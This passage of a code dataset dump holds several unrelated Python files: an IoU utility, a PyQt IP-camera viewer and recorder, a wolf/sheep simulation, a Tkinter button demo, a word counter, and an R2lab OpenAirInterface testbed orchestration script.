iou(nboxes, kboxes):\n '''\n nbox:numpy array,shape(n, 4,):xmin,ymin,xmax,ymax, or (4,)\n input box\n kboxes:numpy array,shape (k,4):xmin,ymin,xmax,ymax\n input ground truth boxes\n 返回值:\n ious: numpy.array, shape (n, k)\n '''\n\n if nboxes.ndim == 2 and nboxes.shape[-1]:\n n = nboxes.shape[0]\n k = kboxes.shape[0]\n nboxes = nboxes[:, np.newaxis, :]\n # nboxes = np.tile(nboxes, (1, k, 1))\n kboxes = kboxes[np.newaxis, :, :]\n # kboxes = np.tile(kboxes, (n, 1, 1))\n\n box_area = (nboxes[..., 2] - nboxes[..., 0] + 1) * (nboxes[..., 3] - nboxes[..., 1] + 1)\n area = (kboxes[..., 2] - kboxes[..., 0] + 1) * (kboxes[..., 3] - kboxes[..., 1] + 1)\n xx1 = np.maximum(nboxes[..., 0], kboxes[..., 0])\n yy1 = np.maximum(nboxes[..., 1], kboxes[..., 1])\n xx2 = np.minimum(nboxes[..., 2], kboxes[..., 2])\n yy2 = np.minimum(nboxes[..., 3], kboxes[..., 3])\n\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n inter = w * h\n ious = inter / (box_area + area - inter)\n return ious\n\n\ndef avg_iou(bboxes, clusters):\n max_ious =[np.max(iou(bboxes[i], clusters)) for i in range(bboxes.shape[0])]\n return np.mean(max_ious)","sub_path":"research/object_detection/dataset_tools/utils/avg_iou.py","file_name":"avg_iou.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197824387","text":"import sys\nimport time\nimport urllib.request\nimport cv2\nfrom PyQt5.QtWidgets import QApplication, QDialog, QWidget, QMessageBox, QFileDialog, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, QTimer, QRectF, QThread, Qt\nfrom collections import deque\nfrom ui_mainwindow2 import Ui_MainWindow\nsys.path.append(\"D:/data/Python/\") # needed to import 'pythonOnvifDomecam' if not in the same directory\nfrom pythonOnvifDomecam import MegapixelDomeCamera as cam, config\n\nclass Thread(QThread):\n ''' Thread(xui): Thread to capture the individual frames which are then passed as QImage to the interrupt routine. \n If record flag (ui.record) is True, video will be recorded to file ui.out''' \n def __init__(self):\n super().__init__()\n # ui = callingClass # class that sets the recording flag and defines the output file\n # self.cap = cv2.VideoCapture(0) # To read built-in web cam\n self.cap = cv2.VideoCapture('rtsp://'+config.host+':'+str(config.rtsp_port)+config.rtsp_url) # To read stream of IP camera\n fac = 0.5 # reduce image resolution for video file\n self.size = (int(self.cap.get(3)*fac), int(self.cap.get(4)*fac))\n self.que = deque(maxlen=100)\n\n changePixmap = pyqtSignal(QImage)\n\n def run(self):\n while (self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret:\n resized = cv2.resize(frame, self.size, interpolation = cv2.INTER_AREA)\n self.que.append(resized)\n # rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n rgbImage = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)\n if ui.record:\n # write the video frame to file\n ui.out.write(resized)\n myImage = QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0], QImage.Format_RGB888)\n myImage = myImage.scaled(640*2, 480*2, Qt.KeepAspectRatio)\n self.changePixmap.emit(myImage)\n ui.countDown -= 1\n if ui.countDown == 0:\n ui.writeVideoBuffer()\n\nclass MyWindow(Ui_MainWindow,QWidget): # Inheritage from QWidget is important for pyqtSignal\n timer = QTimer()\n\n def myModifications(self):\n self.pushButton1.clicked.connect(self.onPushButton1)\n self.pushButton2.clicked.connect(self.onPushButton2)\n self.pushButton3.clicked.connect(self.onPushButton3)\n self.pushButton4.clicked.connect(self.onPushButton4)\n self.pushButtonReithalle.clicked.connect(self.onPushButtonReithalle)\n self.pushButtonParken1.clicked.connect(self.onPushButtonParken1)\n self.pushButtonParken2.clicked.connect(self.onPushButtonParken2)\n self.pushButtonTest.clicked.connect(self.onTest)\n self.pushButtonRecord.clicked.connect(self.onRecord)\n self.pushButtonSnapshot.clicked.connect(self.onPushButtonSnapshot)\n self.actionSave_as.triggered.connect(self.onActionFilename)\n self.actionAbout.triggered.connect(self.onActionAbout)\n # self.actionHelp.triggered.connect(self.onActionCommands)\n self.record = False\n self.countDown = -1 # If countDown is zero, the video buffer is written to file.\n self.th = Thread()\n self.th.changePixmap.connect(self.setImage) # Defining interrupt routine for QImage data\n self.th.start()\n\n\n def onPushButton1(self):\n self.camera.moveToPositionPreset(1)\n\n def onPushButton2(self):\n self.camera.moveToPositionPreset(2)\n\n def onPushButton3(self):\n self.camera.moveToPositionPreset(3)\n\n def onPushButton4(self):\n self.camera.moveToPositionPreset(4)\n\n def onPushButtonReithalle(self):\n self.camera.moveToPositionPreset(5)\n \n def onPushButtonParken1(self):\n self.camera.moveToPositionPreset(6)\n \n def onPushButtonParken2(self):\n self.camera.moveToPositionPreset(7)\n \n def onPushButtonSnapshot(self):\n password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n password_mgr.add_password(None, 'http://'+config.host, config.user, config.password)\n handler = urllib.request.HTTPBasicAuthHandler(password_mgr)\n opener = urllib.request.build_opener(handler)\n opener.open(self.camera.getSnapshot())\n urllib.request.install_opener(opener)\n data = urllib.request.urlopen(self.camera.getSnapshot()).read()\n self.snapshot = QPixmap()\n self.snapshot.loadFromData(data)\n self.onActionFilename()\n\n def onActionFilename(self): \n options = QFileDialog.Options()\n #options |= QFileDialog.DontUseNativeDialog\n # jpgFile, _ = QFileDialog.getSaveFileName(self,\"Select file:\" , \"D:\\\\Daten\\\\*.jpg\", options=options)\n jpgFile = 'pic_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.jpg'\n if jpgFile:\n self.snapshot.save(jpgFile)\n \n def onActionAbout(self):\n print(\"About ...\")\n QMessageBox.about(self, \"About\",\n \"\"\"Testing routines to control an IP camera.\n (@MLU-WFW)\"\"\")\n\n @pyqtSlot(QImage)\n def setImage(self, image):\n '''Plots the QImage argument on the label 'labelFrame'. \n Interrupt routine to accept QImage data and to push them to a label.'''\n self.pixMap = QPixmap.fromImage(image)\n self.labelFrame.setPixmap(self.pixMap)\n\n def setupCam(self):\n self.camera = cam.MegapixelDomeCamera(config.host, config.port, config.user, config.password)\n\n def onRecord(self):\n if not self.record:\n self.saveVideoStart()\n self.pushButtonRecord.setStyleSheet(\"background-color:yellow;\")\n self.pushButtonRecord.setText(\"Stop\")\n else:\n self.saveVideoStopp()\n self.pushButtonRecord.setText(\"Record\")\n self.pushButtonRecord.setStyleSheet(\"background-color:white;\")\n\n def saveVideoStart(self): \n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n file = 'vid_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.avi'\n self.out = cv2.VideoWriter(file,fourcc, 25.0, self.th.size)\n self.record = True\n\n def saveVideoStopp(self): \n self.record = False\n self.out.release()\n\n def onTest(self):\n self.countDown = 50 # Count the next 50 frames. Afterwards the video buffer is written to file.\n \n def writeVideoBuffer(self):\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n file = 'snap_'+time.strftime(\"%Y%m%d_%H%M%S\")+'.avi'\n outSnap = cv2.VideoWriter(file,fourcc, 25.0, self.th.size)\n for i in range(min(100,len(self.th.que))):\n outSnap.write(self.th.que.popleft())\n outSnap.release()\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = MyWindow()\n ui.setupUi(MainWindow)\n ui.setupCam()\n ui.myModifications()\n MainWindow.show()\n sys.exit(app.exec_())","sub_path":"GUI_DomeCamera2.py","file_name":"GUI_DomeCamera2.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"431625411","text":"import grass_class\nimport fire_class\nimport dirt_class\nimport tree_class\nimport sheep_class\nfrom settings import TILE_SIZE\nfrom settings import GAME_SIZE\nimport settings\nimport numpy as np\nimport random\nimport math\nimport animal\nimport game\n\n\nclass wolf(animal.animal):\n def __init__(self, x, y, colour, range, food, tile):\n super().__init__(x, y, colour, range, food, tile)\n\n def cycle(self, environment, round):\n if self.food == 0:\n return self.starve()\n\n sheep_location = self.get_location_of_object(sheep_class.sheep, environment)\n\n if round == 0:\n move_x = random.randrange(-1, 2, 1)\n move_y = random.randrange(-1, 2, 1)\n\n else:\n if len(sheep_location) != 0:\n best_move = self.chooseMove(environment)\n #print(\"BEST MOVE IS : \"+str(best_move))\n move_y = best_move[0]\n move_x = best_move[1]\n else:\n move_x = random.randrange(-1, 2, 1)\n move_y = random.randrange(-1, 2, 1)\n\n if self.x < TILE_SIZE:\n move_x += 1\n elif self.x >= GAME_SIZE-(TILE_SIZE+1):\n move_x -= 1\n if self.y < TILE_SIZE:\n move_y += 1\n elif self.y >= GAME_SIZE-(TILE_SIZE+1):\n move_y -= 1\n i, j = 0, 0\n for rows in environment:\n for element in rows:\n if(element != None):\n if self.x-1 <= element.x <= self.x+1 or self.y-1 <= element.y <= self.y+1:\n if isinstance(element, fire_class.fire) and settings.WEATHER != \"Rain\" and -1 <=j<=1 and -1<=i<=1:\n return self.burn() #if sheep is adjacent to fire, 50% chance it burns\n j += 1\n j = self.range * -1\n i += 1\n return self.move(self.x + (move_x * TILE_SIZE), self.y + (move_y * TILE_SIZE))\n\n def chooseMove(self, environment):\n # wolves have the ability to move 8 direction instead of 4 like sheep\n move = [(-1, 0), (-1, -1), (-1, 1), (1, 0), (1, -1), (1, 1), (0, -1), (0, 1)]\n grass_locations = self.get_location_of_object(grass_class.grass, environment)\n tree_location = self.get_location_of_object(tree_class.tree, environment)\n fire_location = self.get_location_of_object(fire_class.fire, environment)\n sheep_location = self.get_location_of_object(sheep_class.sheep, environment)\n wolf_location = self.get_location_of_object(wolf, environment)\n\n if len(fire_location) > 0:\n print(fire_location)\n for element in fire_location:\n # because the wolves can move diagonally the Euclidian distance is a better heuristic\n l = self.move_calc(element, move)\n\n heur = (l.index(min(l)), (min(l)))\n\n try:\n if heur[1] < h1[1]:\n h1 = heur\n except:\n h1 = heur\n opp = move[h1[0]]\n print('wolf')\n print(opp)\n opp = (opp[0]*-1, opp[1]*-1)\n print(opp)\n return opp\n else:\n for element in sheep_location:\n # because the wolves can move diagonally the Euclidian distance is a better heuristic\n l = self.move_calc(element, move)\n\n heur = (l.index(min(l)), (min(l)))\n\n try:\n if heur[1] < h1[1]:\n h1 = heur\n except:\n h1 = heur\n\n return move[h1[0]]\n\n def move_calc(self, element, move):\n up = math.sqrt((move[0][0] - element[0])**2 + (move[0][1] - element[1])**2)\n up_left = math.sqrt((move[1][0] - element[0])**2 + (move[1][1] - element[1])**2)\n up_right = math.sqrt((move[2][0] - element[0])**2 + (move[2][1] - element[1])**2)\n down = math.sqrt((move[3][0] - element[0])**2 + (move[3][1] - element[1])**2)\n down_left = math.sqrt((move[4][0] - element[0])**2 + (move[4][1] - element[1])**2)\n down_right = math.sqrt((move[5][0] - element[0])**2 + (move[5][1] - element[1])**2)\n left = math.sqrt((move[6][0] - element[0])**2 + (move[6][1] - element[1])**2)\n right = math.sqrt((move[7][0] - element[0])**2 + (move[7][1] - element[1])**2)\n\n return [up, up_left, up_right, down, down_left, down_right, left, right]\n","sub_path":"wolf_class.py","file_name":"wolf_class.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"172744291","text":"# coding=utf-8\nfrom tkinter import *\n\n# 定义Button的事件处理函数\n\n\ndef hello_button(): # 每点击一次button,程序打印hello button\n import random\n text = ['小隙沉舟,同心方可戮力', '读诗书,尚礼仪,守纲常', '宁为玉碎,不能瓦全']\n print(text[random.randint(0, 2)])\nroot = Tk()\n\n\nbutton1 = Button(root, text='Hello Button', command=hello_button)\nbutton1.pack()\n\nbutton2 = Button(root, text=\"Hello Button\", relief=FLAT) # 失去了button的作用\nbutton2.pack()\n\n# 设置button的外观(flat,groove,raised,ridge,solid,sunken)\nbutton3 = Button(root, text='Hello button', relief=SUNKEN, command=hello_button)\nbutton3.pack()\n\n# button显示图像\n# image:可以使用gif图像 img=PhotoImage(root, file=filepath)\n# button4 = Button(root, Image=PhotoImage(root, file=r'C:\\Users\\xilig\\Pictures\\1.gif'))\n# button4.pack()\n# root.mainloop()\n\n# button显示文本与图像,和text同理\n\n\ndef cb1():\n print('button1 clicked')\n\n\ndef cb2(event):\n print(event)\n print('button2 clicked')\n\n\ndef cb3():\n print('button3 clicked')\n\nbutton4 = Button(root, text='Button4', command=cb1)\nbutton4.pack()\nbutton5 = Button(root, text='Button5')\nbutton5.bind(\"\", cb2)\nbutton5.pack()\nbutton5.focus_set()\nbutton6 = Button(root, text='button6', command=cb3)\nbutton6.pack()\n\n# button的高与宽三种方法:Button(root,width=30,height=8),button1['width']=30,button1.configure(width=30,height=3)\n\n# 设置Button文本在控件上的显示位置\nfor a in ['n', 's', 'e', 'w', 'ne', 'nw', 'se', 'sw']:\n Button(root, text='anchor', anchor=a, width=30, height=1).pack()\n\n# 设置Button的边框\nfor b in range(5):\n Button(root, text=str(b), bd=b).pack()\n\n# 设置Button状态 normal active disabled\n\n\ndef state_print():\n print('state')\nfor r in ['normal', 'active', 'disabled']:\n Button(root, text=r, state=r, width=30, command=state_print).pack()\n\n\n# 绑定Button与变量V,当V变化时,button显示的文本也随之变化\ndef change_text():\n if b['text'] == 'text':\n v.set('change')\n print('change')\n else:\n v.set('text')\n print('text')\nv = StringVar()\nb = Button(root, textvariable=v, command=change_text)\nv.set('text')\nb.pack()\nroot.mainloop()\n","sub_path":"Python/Tkinter_/button_.py","file_name":"button_.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640873214","text":"import collections #计数器\nimport os\nimport string\n\npath = \"/Users/U/workspace/python learning/show-me-the-code/0006/diary/\" #diary dir\ndir = os.listdir(path) #读取目录\nsum = 0 #单词总数\nwanna = 'I' #想要统计的单词\nfor file in dir: #遍历目录\n with open(path + file) as diary:\n list = diary.read().split(' ') #单词以空格分开\n newlist = [word.translate(word.maketrans(\"\",\"\",string.punctuation)) for word in list] #干掉所有标点符号\n # 用maketrans创建一个映射表 translate根据映射表转化字符串\n sum += int(collections.Counter(newlist)[wanna]) #统计所以日记中单词\"I\"的个数\n # print(newlist) #test newlist\nprint('%s:%d' % (wanna,sum))\n","sub_path":"0007/test/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616675126","text":"#!/usr/bin/env python3\n\n# pylint: disable=c0111, w0622\n\nimport os.path\nimport time\nimport asyncio\nimport itertools\nfrom collections import defaultdict\n\nfrom asynciojobs import Scheduler, Job, Sequence\n\nfrom apssh import SshNode, SshJob, Run, RunScript, Pull\nfrom apssh import LocalNode\nfrom apssh.formatters import TimeHostFormatter\n\n\n# illustrating the r2lab library\n# utils\nfrom r2lab import r2lab_hostname, r2lab_parse_slice, find_local_embedded_script\n# argument parsing\nfrom r2lab import ListOfChoices, ListOfChoicesNullReset\n\nfrom probe_map import hardwired_hardware_map, probe_hardware_map, show_hardware_map\n\n\n# include the set of utility scripts that are included by the r2lab kit\nINCLUDES = [find_local_embedded_script(x) for x in [\n \"r2labutils.sh\", \"nodes.sh\", \"oai-common.sh\",\n]]\n\n\n# first stage\n\n\n# pylint: disable=r0912, r0914, r0915\ndef run(*,\n # the pieces to use\n slice, hss, epc, enb, phones,\n e3372_ues, oai_ues, gnuradios,\n e3372_ue_xterms, oai_ue_xterms, gnuradio_xterms,\n # boolean flags\n load_nodes, skip_reset_usb, oscillo,\n # the images to load\n image_gw, image_enb, image_oai_ue, image_e3372_ue, image_gnuradio,\n # miscell\n n_rb, verbose, dry_run):\n \"\"\"\n ##########\n # 3 methods to get nodes ready\n # (*) load images\n # (*) reset nodes that are known to have the right image\n # (*) do nothing, proceed to experiment\n\n expects e.g.\n * slice : s.t like inria_oai.skype@faraday.inria.fr\n * hss : 04\n * epc : 03\n * enb : 23\n * phones: list of indices of phones to use\n\n * e3372_ues : list of nodes to use as a UE using e3372\n * oai_ues : list of nodes to use as a UE using OAI\n * gnuradios : list of nodes to load with a gnuradio image\n\n * image_* : the name of the images to load on the various nodes\n\n Plus\n * load_nodes: whether to load images or not - in which case\n image_gw, image_enb and image_*\n are used to tell the image names\n * skip_reset_usb : the USRP board will be reset as well unless this is set\n \"\"\"\n\n # what argparse knows as a slice actually is a gateway (user + host)\n gwuser, gwhost = r2lab_parse_slice(slice)\n gwnode = SshNode(hostname=gwhost, username=gwuser,\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n\n hostnames = hssname, epcname, enbname = [\n r2lab_hostname(x) for x in (hss, epc, enb)]\n\n optional_ids = e3372_ues + oai_ues + gnuradios + \\\n e3372_ue_xterms + oai_ue_xterms + gnuradio_xterms\n\n hssnode, epcnode, enbnode = [\n SshNode(gateway=gwnode, hostname=hostname, username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n for hostname in hostnames\n ]\n\n sched = Scheduler(verbose=verbose)\n\n # preparation\n job_check_for_lease = SshJob(\n node=gwnode,\n command=[\"rhubarbe\", \"leases\", \"--check\"],\n label=\"check we have a current lease\",\n scheduler=sched,\n )\n\n # turn off all nodes\n turn_off_command = [\"rhubarbe\", \"off\", \"-a\"]\n\n # except our 3 nodes and the optional ones\n turn_off_command += [f\"~{x}\" for x in [hss, epc, enb] + optional_ids]\n\n # only do the turn-off thing if load_nodes\n if load_nodes:\n job_off_nodes = SshJob( # pylint: disable=w0612\n node=gwnode,\n # switch off all nodes but the ones we use\n command=turn_off_command,\n label=\"turn off unused nodes\",\n required=job_check_for_lease,\n scheduler=sched,\n )\n\n # actually run this in the gateway, not on the macphone\n # the ssh keys are stored in the gateway and we do not yet have\n # the tools to leverage such remote keys\n job_stop_phones = [SshJob( # pylint: disable=w0612\n node=gwnode,\n command=RunScript(\n # script\n find_local_embedded_script(\"faraday.sh\"),\n # arguments\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-off\",\n # options\n includes=INCLUDES),\n label=f\"put phone{id} in airplane mode\",\n required=job_check_for_lease,\n scheduler=sched,\n ) for id in phones]\n\n # prepare the image-loading phase\n # this will be a dict of items imagename -> ids\n to_load = defaultdict(list)\n to_load[image_gw] += [hss, epc]\n to_load[image_enb] += [enb]\n if e3372_ues:\n to_load[image_e3372_ue] += e3372_ues\n if e3372_ue_xterms:\n to_load[image_e3372_ue] += e3372_ue_xterms\n if oai_ues:\n to_load[image_oai_ue] += oai_ues\n if oai_ue_xterms:\n to_load[image_oai_ue] += oai_ue_xterms\n if gnuradios:\n to_load[image_gnuradio] += gnuradios\n if gnuradio_xterms:\n to_load[image_gnuradio] += gnuradio_xterms\n\n prep_job_by_node = {}\n for image, nodes in to_load.items():\n commands = []\n if load_nodes:\n commands.append(Run(\"rhubarbe\", \"usrpoff\", *nodes))\n commands.append(Run(\"rhubarbe\", \"load\", \"-i\", image, *nodes))\n commands.append(Run(\"rhubarbe\", \"usrpon\", *nodes))\n # always do this\n commands.append(Run(\"rhubarbe\", \"wait\", \"-t\", 120, *nodes))\n job = SshJob(\n node=gwnode,\n commands=commands,\n label=f\"Prepare node(s) {nodes}\",\n required=job_check_for_lease,\n scheduler=sched,\n )\n for node in nodes:\n prep_job_by_node[node] = job\n\n # start services\n job_service_hss = SshJob(\n node=hssnode,\n command=RunScript(find_local_embedded_script(\"oai-hss.sh\"), \"run-hss\", epc,\n includes=INCLUDES),\n label=\"start HSS service\",\n required=prep_job_by_node[hss],\n scheduler=sched,\n )\n\n delay = 15\n job_service_epc = SshJob(\n node=epcnode,\n commands=[\n Run(f\"echo giving HSS a headstart {delay}s to warm up; sleep {delay}\"),\n RunScript(find_local_embedded_script(\"oai-epc.sh\"), \"run-epc\", hss,\n includes=INCLUDES),\n ],\n label=\"start EPC services\",\n required=prep_job_by_node[epc],\n scheduler=sched,\n )\n\n # enodeb\n\n job_warm_enb = SshJob(\n node=enbnode,\n commands=[\n RunScript(find_local_embedded_script(\"oai-enb.sh\"),\n \"warm-enb\", epc, n_rb, not skip_reset_usb,\n includes=INCLUDES),\n ],\n label=\"Warm eNB\",\n required=prep_job_by_node[enb],\n scheduler=sched,\n )\n\n enb_requirements = (job_warm_enb, job_service_hss, job_service_epc)\n\n # wait for everything to be ready, and add an extra grace delay\n\n grace = 30 if load_nodes else 10\n grace_delay = SshJob(\n node=LocalNode(formatter=TimeHostFormatter()),\n command=f\"echo Allowing grace of {grace} seconds; sleep {grace}\",\n required=enb_requirements,\n scheduler=sched,\n )\n\n # start services\n\n job_service_enb = SshJob( # pylint: disable=w0612\n node=enbnode,\n # run-enb expects the id of the epc as a parameter\n # n_rb means number of resource blocks for DL, set to either 25 or 50.\n commands=[\n RunScript(find_local_embedded_script(\"oai-enb.sh\"),\n \"run-enb\", oscillo,\n includes=INCLUDES,\n x11=oscillo\n ),\n ],\n label=\"start softmodem on eNB\",\n required=grace_delay,\n scheduler=sched,\n )\n\n # run experiment per se\n # Manage phone(s)\n # this starts at the same time as the eNB, but some\n # headstart is needed so that eNB actually is ready to serve\n delay = 12\n msg = f\"wait for {delay}s for enodeb to start up\"\n wait_command = f\"echo {msg}; sleep {delay}\"\n\n job_start_phones = [SshJob( # pylint: disable=w0612\n node=gwnode,\n commands=[\n Run(wait_command),\n RunScript(find_local_embedded_script(\"faraday.sh\"),\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-on\",\n includes=INCLUDES),\n RunScript(find_local_embedded_script(\"faraday.sh\"),\n f\"macphone{id}\", \"r2lab-embedded/shell/macphone.sh\", \"phone-start-app\",\n includes=INCLUDES),\n ],\n label=\"start Nexus phone and speedtest app\",\n required=grace_delay,\n scheduler=sched,\n ) for id in phones]\n\n job_ping_phones_from_epc = [SshJob( # pylint: disable=w0612\n node=epcnode,\n commands=[\n Run(\"sleep 10\"),\n Run( f\"ping -c 100 -s 100 -i .05 172.16.0.{id+1} &> /root/ping-phone\"),\n ],\n label=\"ping Nexus phone from EPC\",\n critical=False,\n required=job_start_phones,\n ) for id in phones]\n\n # xterm nodes\n\n colors = [\"wheat\", \"gray\", \"white\", \"darkolivegreen\"]\n\n xterms = e3372_ue_xterms + oai_ue_xterms + gnuradio_xterms\n\n for xterm, color in zip(xterms, itertools.cycle(colors)):\n xterm_node = SshNode(\n gateway=gwnode, hostname=r2lab_hostname(xterm), username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n SshJob(\n node=xterm_node,\n command=Run(f\"xterm -fn -*-fixed-medium-*-*-*-20-*-*-*-*-*-*-*\"\n f\" -bg {color} -geometry 90x10\",\n x11=True),\n label=\"xterm on node {xterm_node.hostname}\",\n required=prep_job_by_node[xterm],\n scheduler=sched,\n # don't set forever; if we do, then these xterms get killed\n # when all other tasks have completed\n # forever = True,\n )\n# # remove dangling requirements - if any - should not be needed but won't hurt either\n sched.sanitize()\n\n print(20*\"*\", \"nodes usage summary\")\n if load_nodes:\n for image, nodes in to_load.items():\n for node in nodes:\n print(f\"node {node} : {image}\")\n else:\n print(\"NODES ARE USED AS IS (no image loaded, no reset)\")\n print(10*\"*\", \"phones usage summary\")\n if phones:\n for phone in phones:\n print(f\"Using phone{phone}\")\n else:\n print(\"No phone involved\")\n\n sched.check_cycles()\n # Update the .dot and .png file for illustration purposes\n if verbose or dry_run:\n sched.list()\n name = \"scenario-load\" if load_nodes else \\\n \"scenario\"\n sched.export_as_dotfile(f\"{name}.dot\")\n os.system(f\"dot -Tpng {name}.dot -o {name}.png\")\n print(f\"(Over)wrote {name}.png\")\n\n if dry_run:\n return False\n\n if verbose:\n input('OK ? - press control C to abort ? ')\n\n if not sched.orchestrate():\n print(f\"RUN KO : {sched.why()}\")\n sched.debrief()\n return False\n else:\n print(\"RUN OK\")\n return True\n\n# use the same signature in addition to run_name by convenience\n\n\ndef collect(run_name, slice, hss, epc, enb, verbose):\n \"\"\"\n retrieves all relevant logs under a common name\n otherwise, same signature as run() for convenience\n\n retrieved stuff will be 3 compressed tars named\n -(hss|epc|enb).tar.gz\n \"\"\"\n\n gwuser, gwhost = r2lab_parse_slice(slice)\n gwnode = SshNode(hostname=gwhost, username=gwuser,\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n\n functions = \"hss\", \"epc\", \"enb\"\n\n hostnames = hssname, epcname, enbname = [\n r2lab_hostname(x) for x in (hss, epc, enb)]\n\n nodes = hssnode, epcnode, enbnode = [\n SshNode(gateway=gwnode, hostname=hostname, username='root',\n formatter=TimeHostFormatter(verbose=verbose), debug=verbose)\n for hostname in hostnames\n ]\n\n # first run a 'capture' function remotely to gather all the relevant\n # info into a single tar named .tgz\n\n capturers = [\n SshJob(\n node=node,\n command=RunScript(find_local_embedded_script(\"oai-common.sh\"),\n f\"capture-{function}\", run_name,\n includes=[find_local_embedded_script(\n f\"oai-{function}.sh\")]),\n label=f\"capturer on {function}\",\n # capture-enb will run oai-as-enb and thus requires oai-enb.sh\n )\n for (node, function) in zip(nodes, functions)]\n\n collectors = [\n SshJob(\n node=node,\n command=Pull(remotepaths=[f\"{run_name}-{function}.tgz\"],\n localpath=\".\"),\n label=f\"collector on {function}\",\n required=capturers,\n )\n for (node, function, capturer) in zip(nodes, functions, capturers)]\n\n sched = Scheduler(verbose=verbose)\n sched.update(capturers)\n sched.update(collectors)\n\n if verbose:\n sched.list()\n\n if not sched.orchestrate():\n print(\"KO\")\n sched.debrief()\n return\n print(\"OK\")\n if os.path.exists(run_name):\n print(f\"local directory {run_name} already exists = NOT UNWRAPPED !\")\n return\n os.mkdir(run_name)\n local_tars = [ f\"{run_name}-{ext}.tgz\" for ext in ['hss', 'epc', 'enb']]\n for tar in local_tars:\n print(f\"Untaring {tar} in {run_name}\")\n os.system(f\"tar -C {run_name} -xzf {tar}\")\n\n\ndef main():\n\n hardware_map = hardwired_hardware_map()\n\n def_slice = \"inria_oai@faraday.inria.fr\"\n # WARNING: initially we used 37 and 36 for hss and epc,\n # but these boxes now have a USRP N210 and can't use the data network anymore\n def_hss, def_epc, def_enb = 7, 8, 23\n\n def_image_gw = \"oai-cn\"\n def_image_enb = \"oai-enb\"\n def_image_gnuradio = \"gnuradio\"\n def_image_oai_ue = \"oai-ue\"\n def_image_e3372_ue = \"e3372-ue\"\n\n # raw formatting (for -x mostly) + show defaults\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, RawTextHelpFormatter\n\n class RawAndDefaultsFormatter(ArgumentDefaultsHelpFormatter, RawTextHelpFormatter):\n pass\n parser = ArgumentParser(formatter_class=RawAndDefaultsFormatter)\n\n parser.add_argument(\"-s\", \"--slice\", default=def_slice,\n help=\"slice to use for entering\")\n\n parser.add_argument(\"--hss\", default=def_hss,\n help=\"id of the node that runs the HSS\")\n parser.add_argument(\"--epc\", default=def_epc,\n help=\"id of the node that runs the EPC\")\n parser.add_argument(\"--enb\", default=def_enb,\n help=\"\"\"id of the node that runs the eNodeB',\nrequires a USRP b210 and 'duplexer for eNodeB'\"\"\")\n\n parser.add_argument(\"-p\", \"--phones\", dest='phones',\n action=ListOfChoicesNullReset, type=int, choices=(\n 1, 2, 0),\n default=[1],\n help='Commercial phones to use; use -p 0 to choose no phone')\n\n e3372_nodes = hardware_map['E3372-UE']\n parser.add_argument(\"-E\", \"--e3372\", dest='e3372_ues', default=[],\n action=ListOfChoices, type=int, choices=e3372_nodes,\n help=f\"\"\"id(s) of nodes to be used as a E3372-based UE\nchoose among {e3372_nodes}\"\"\")\n parser.add_argument(\"-e\", \"--e3372-xterm\", dest='e3372_ue_xterms', default=[],\n action=ListOfChoices, type=int, choices=e3372_nodes,\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n oaiue_nodes = hardware_map['OAI-UE']\n parser.add_argument(\"-U\", \"--oai-ue\", dest='oai_ues', default=[],\n action=ListOfChoices, type=int, choices=oaiue_nodes,\n help=f\"\"\"id(s) of nodes to be used as a OAI-based UE\nchoose among {oaiue_nodes} - note that these notes are also\nsuitable for scrambling the 2.54 GHz uplink\"\"\")\n parser.add_argument(\"-u\", \"--oai-ue-xterm\", dest='oai_ue_xterms', default=[],\n action=ListOfChoices, type=int, choices=oaiue_nodes,\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n # xxx could use choices here too\n parser.add_argument(\"-G\", \"--gnuradio\", dest='gnuradios', default=[], action='append',\n help=\"\"\"id(s) of nodes intended to run gnuradio;\nprefer using fit10 and fit11 (B210 without duplexer)\"\"\")\n parser.add_argument(\"-g\", \"--gnuradio-xterm\", dest='gnuradio_xterms', default=[], action='append',\n help=\"\"\"likewise, with an xterm on top\"\"\")\n\n parser.add_argument(\"-l\", \"--load\", dest='load_nodes', action='store_true', default=False,\n help='load images as well')\n parser.add_argument(\"-f\", \"--fast\", dest=\"skip_reset_usb\",\n default=False, action='store_true',\n help=\"\"\"Skip resetting the USB boards if set\"\"\")\n\n parser.add_argument(\"-o\", \"--oscillo\", dest='oscillo',\n action='store_true', default=False,\n help='run eNB with oscillo function; no oscillo by default')\n\n parser.add_argument(\"--image-gw\", default=def_image_gw,\n help=\"image to load in hss and epc nodes\")\n parser.add_argument(\"--image-enb\", default=def_image_enb,\n help=\"image to load in enb node\")\n 